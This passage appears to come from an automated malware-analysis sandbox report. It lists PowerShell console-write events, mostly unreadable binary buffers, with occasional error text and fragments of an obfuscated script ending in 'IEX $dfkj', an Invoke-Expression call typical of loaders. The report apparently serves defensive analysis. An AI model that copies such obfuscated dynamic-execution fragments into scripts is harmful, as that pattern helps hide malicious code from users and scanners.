Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....=......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H>................7.............}..v.....>......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....E......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....HF................7.............}..v.....F......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....M......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....HN................7.............}..v.....N......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....S................7.............}..v....@T......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....[......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....[................7.............}..v....@\......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....p`......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(a................7.............}..v.....a......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v.....f......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k.....g................7.............}..v.... h......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3....... .......:T.k......T...............7.............}..v.....k......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k....hl................7.............}..v.....l......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............:T.k......T...............7.............}..v.....c......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k.....c................7.............}..v....@d......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v.....k......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k.....k................7.............}..v....@l......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............:T.k......T...............7.............}..v.....q......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k....`r................7.............}..v.....r......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....v......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............ZU.k.....w................7.............}..v....(x......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............:T.k......T...............7.............}..v.....~......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....h.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.... .................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....$......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....%................7.............}..v....0&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....,......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....-................7.............}..v....0.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(3................7.............}..v.....3......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p:......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(;................7.............}..v.....;......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......?......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....@................7.............}..v.....A......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....PF......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....G................7.............}..v.....G......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v.....K......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....K................7.............}..v....PL......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....H.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v....h.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.... .................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.4.9.............}..v............0.b...............T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o................l.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o................m.k....h.................7.............}..v............0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{.......t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .<.<.<.<. . .$.d.f.k.j.....0.b...............T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{................m.k......................7.............}..v....`.......0.b.............h.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................l.k......T...............7.............}..v....(%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.....................m.k.....%................7.............}..v....`&......0.b.............h.T.............(...............	Jump to behavior
